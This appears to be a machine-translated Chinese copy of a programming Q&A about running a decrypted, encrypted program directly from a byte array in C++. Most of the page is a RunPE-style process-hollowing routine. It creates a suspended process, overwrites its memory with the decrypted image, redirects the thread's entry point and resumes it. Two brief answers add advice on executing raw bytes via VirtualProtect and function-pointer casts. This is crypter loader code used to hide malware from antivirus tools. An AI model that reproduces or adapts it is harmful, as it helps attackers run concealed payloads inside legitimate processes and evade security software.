如何在C++中执行字节数组

How to execute a Byte Array in C++

本文关键字：字节字节数数组执行 C++ 更新时间：2023-10-16

假设我有一个加密程序，我用解密器打开它，它将字节加载到数组中并解密它。

我想知道的是如何在不必创建另一个可执行文件的情况下执行这些字节。

我读到可以使用"分叉"，这是最好的方法。但是我无法成功运行我的代码，并且它不会返回任何错误。这是我得到的样本：

    //<main>
    char* lpMemory;
    lpMemory = (char*)malloc (fileSize);
    memset(lpMemory,0,fileSize);
    memcpy (lpMemory, fileBuf, fileSize);
    RunFromMemory(lpMemory, /* What here? */);
    //</main>
void RunFromMemory(char* pImage,char* pPath)
{
DWORD dwWritten = 0;
DWORD dwHeader = 0;
DWORD dwImageSize = 0;
DWORD dwSectionCount = 0;
DWORD dwSectionSize = 0;
DWORD firstSection = 0;
DWORD previousProtection = 0;
DWORD jmpSize = 0;
IMAGE_NT_HEADERS INH;
IMAGE_DOS_HEADER IDH;
IMAGE_SECTION_HEADER Sections[1000];
PROCESS_INFORMATION peProcessInformation;
STARTUPINFO peStartUpInformation;
CONTEXT pContext;
char* pMemory;
char* pFile;
memcpy(&IDH,pImage,sizeof(IDH));
memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));
dwImageSize = INH.OptionalHeader.SizeOfImage;
pMemory = (char*)malloc(dwImageSize);
memset(pMemory,0,dwImageSize);
pFile = pMemory;
dwHeader = INH.OptionalHeader.SizeOfHeaders;
firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);
memcpy(pFile,pImage,dwHeader);
if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
{
    jmpSize = INH.OptionalHeader.SizeOfHeaders;
}
else
{
    jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
    jmpSize += 1;
    jmpSize *= INH.OptionalHeader.SectionAlignment;
}
pFile = (char*)((DWORD)pFile + jmpSize);
for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
{
    jmpSize = 0;
    dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
    memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);
    if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
    {
        jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
    }
    else
    {
        jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
        jmpSize += 1;
        jmpSize *= INH.OptionalHeader.SectionAlignment;
    }
    pFile = (char*)((DWORD)pFile + jmpSize);
}

memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
memset(&pContext,0,sizeof(CONTEXT));
peStartUpInformation.cb = sizeof(peStartUpInformation);
if(CreateProcess(NULL, pPath, NULL /*&secAttrib*/, NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation))
{
    pContext.ContextFlags = CONTEXT_FULL;
    GetThreadContext(peProcessInformation.hThread,&pContext);
    VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
    WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
    WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
    pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
    SetThreadContext(peProcessInformation.hThread,&pContext);
    VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
    ResumeThread(peProcessInformation.hThread);
}
free(pMemory);
}

正如您可能已经猜到的那样，"文件大小"是程序的大小，"fileBuf"是 Byte 数组。我相信这两个值都是正确的。

任何可能对我有帮助的资源链接都值得赞赏谢谢。

根据数组中的字节实际表示的内容，您可能只需将数组指针类型转换为函数指针，然后像调用任何其他指针一样调用"函数"。为了工作，数组必须驻留在可执行内存中（见VirtualProtect()），并且只包含汇编指令的字节表示，没有其他内容。

是的，有可能：最简单的方法是将字节数组的指针转换为函数指针，然后在调用它之后。第二种方法是使用内联汇编器并对字节数组的地址执行 jmp。可能分配数组的堆或堆栈将无法执行，那么您需要使用 VirtualProtect 和相关 api（适用于 win32 ）。